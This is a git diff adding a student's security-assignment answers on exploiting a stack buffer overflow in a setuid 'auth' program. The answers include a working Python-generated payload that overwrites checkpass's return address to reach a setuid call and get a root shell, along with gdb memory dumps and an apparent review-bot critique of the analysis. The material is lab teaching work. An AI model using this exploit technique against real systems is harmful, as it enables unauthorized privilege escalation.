path: root/CamilStaps-s4498062-Assignment-3/ex4
Diffstat (limited to 'CamilStaps-s4498062-Assignment-3/ex4')
-rw-r--r--  CamilStaps-s4498062-Assignment-3/ex4  47
1 files changed, 47 insertions, 0 deletions
diff --git a/CamilStaps-s4498062-Assignment-3/ex4 b/CamilStaps-s4498062-Assignment-3/ex4
new file mode 100644
index 0000000..47214a6
--- /dev/null
+++ b/CamilStaps-s4498062-Assignment-3/ex4
@@ -0,0 +1,47 @@
+a
+ That would be 0x40085a.
+
+b
+ Done. That gives a root shell:
+
+ $ ./auth "$(python -c 'import struct; print "A"*264+struct.pack("<Q",0x40085a)')"
+ ERROR: password incorrect
+ #
+ Segmentation fault
+
+c
+ The return address of checkpass has been overwritten with the address of the
+ setuid call. So, after executing checkpass as normally, we 'return' to that
+ setuid call. This explains why we don't read "Starting root shell".
+
+ (gdb) ...
+ 0x000000000040082d 14 strcpy(password,input);
+ 0x000000000040082a <checkpass+10>: 48 89 e7 mov rdi,rsp
+ => 0x000000000040082d <checkpass+13>: e8 0e fe ff ff call 0x400640 <strcpy@plt>
+ (gdb) x /64bx ($rsp+256)
+ 0x7ffe5af18c50: 0x40 0x8d 0xf1 0x5a 0xfe 0x7f 0x00 0x00
+ --> 0x7ffe5af18c58: 0xf2 0x06 0x40 0x00 0x00 0x00 0x00 0x00
+ 0x7ffe5af18c60: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
+ 0x7ffe5af18c68: 0x45 0x9b 0x05 0x5d 0xdc 0x7f 0x00 0x00
+ 0x7ffe5af18c70: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
+ 0x7ffe5af18c78: 0x48 0x8d 0xf1 0x5a 0xfe 0x7f 0x00 0x00
+ 0x7ffe5af18c80: 0x00 0x00 0x00 0x00 0x02 0x00 0x00 0x00
+ 0x7ffe5af18c88: 0xe0 0x06 0x40 0x00 0x00 0x00 0x00 0x00
+ (gdb) ni
+ 15 hash1 = crypt(password,"$6$1122334455667788$");
+ => 0x0000000000400832 <checkpass+18>: be 24 09 40 00 mov esi,0x400924
+ 0x0000000000400837 <checkpass+23>: 48 89 e7 mov rdi,rsp
+ 0x000000000040083a <checkpass+26>: e8 41 fe ff ff call 0x400680 <crypt@plt>
+ (gdb) x /64bx ($rsp+256)
+ 0x7ffe5af18c50: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
+ --> 0x7ffe5af18c58: 0x5a 0x08 0x40 0x00 0x00 0x00 0x00 0x00
+ 0x7ffe5af18c60: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
+ 0x7ffe5af18c68: 0x45 0x9b 0x05 0x5d 0xdc 0x7f 0x00 0x00
+ 0x7ffe5af18c70: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
+ 0x7ffe5af18c78: 0x48 0x8d 0xf1 0x5a 0xfe 0x7f 0x00 0x00
+ 0x7ffe5af18c80: 0x00 0x00 0x00 0x00 0x02 0x00 0x00 0x00
+ 0x7ffe5af18c88: 0xe0 0x06 0x40 0x00 0x00 0x00 0x00 0x00
+
+ The relevant line is marked with -->. Before the strcpy, the correct return
+ address is there. After, there is our own address.
+
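Review bot: the answer to (a) gives 0x40085a with nothing a reader can check it against; include the disassembly line that shows the `call setuid` at that address (the dump after `ni` in (c) only proves that the return slot now contains 0x40085a, not what instruction lives there). In (b), the padding length deserves one line of justification that the dumps in (c) already support: `password` lives at rsp (`mov rdi,rsp` at checkpass+10) and the saved return address sits at rsp+264, which is why `x /64bx ($rsp+256)` shows eight 0x41 bytes in the first row and the overwritten slot in the `-->` row. The same dump explains a subtlety the text passes over: the five 0x00 bytes that `struct.pack("<Q", ...)` appends never reach argv (the shell drops NUL bytes from `$(...)` and the C string would end there anyway), so strcpy writes 0x5a 0x08 0x40 plus its terminating NUL at rsp+264..267, and the overwrite only yields a clean 0x000000000040085a because bytes 267 and up of the saved address were already zero before the copy (0xf2 0x06 0x40 0x00 ... in the pre-strcpy dump). Finally, the `Segmentation fault` in the transcript appears only after the root shell exits (the `#` prompt precedes it) and merits a sentence: the 'return' lands on a `call` in the middle of a function whose frame was never set up for this path, so when that function reaches its own `ret` it pops a stack it did not build. A short note that the 0x7ffe5af18c50-style stack addresses vary per run under ASLR, while 0x40085a is a fixed address in the non-PIE text segment, would also make clear why the hard-coded target works outside gdb.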